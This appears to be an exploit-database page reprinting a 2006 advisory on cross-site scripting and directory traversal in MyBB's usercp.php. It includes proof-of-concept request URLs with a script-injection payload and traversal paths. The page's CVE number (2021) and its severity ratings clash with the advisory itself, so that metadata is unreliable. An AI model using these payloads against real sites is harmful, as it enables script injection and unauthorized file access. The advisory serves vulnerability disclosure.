Advertisement






MYBB XSS and Dir Traversal in usercp.php

CVE Category Price Severity
CVE-2021-3767 CWE-79 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2006-08-07
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080028

Below is a copy:

Vulnerable products : MYBB 1.x

Vendor: http://www.mybboard.net

Risk: Low

Vulnerabilities: MYBB XSS and Dir Traversal in usercp.php

Date :

--------------------

Found : Feb 22 2006

Vendor Contacted : N/A

Release Date : N/A

About :

--------------------

MyBB is a powerful, efficient and free forum package developed in PHP and MySQL.MyBB has been designed with the end users in mind, you and your subscribers. Full control over your discussion system is p resented right at the tip of your fingers, from multiple styles and themes to the ultimate customisation of your forums using the template system.

Vulnerability:

--------------------

Cross_Site_Scripting (XSS,CSS):

MYBB is affected by a cross-site scripting vulnerability. This issue is due to the failure of the application to properly sanitize user-

supplied input.

As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed

in the browser of an unsuspecting user when followed.

Detail and PoC :

--------------------

Cross_Site_Scripting:

The application does not validate the "gallery" variable upon submission to the usercp.php script.

POC:

/usercp.php?action=avatar&gallery=%22%3E%3Cscript%3Ealert(1)%3C/script%3
E

Dir Traversal For images:

POC:

/usercp.php?action=avatar&gallery=../../uploads

usercp.php?action=do_avatar&gallery=../../../../../../..dir&avatar=myfil
e

Solution :

--------------------

N/A

Credit :

--------------------

Discoverd by : Roozbeh Afrasiabi

roozbeh_afrasiabi[at]yahoo[dot]com

black_death[at]kapda[dot]net

POC by : imei addmimistrator

addmimistrator[at]gmail[dot]com

imei[at]Kapda[dot]net

--------------------

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum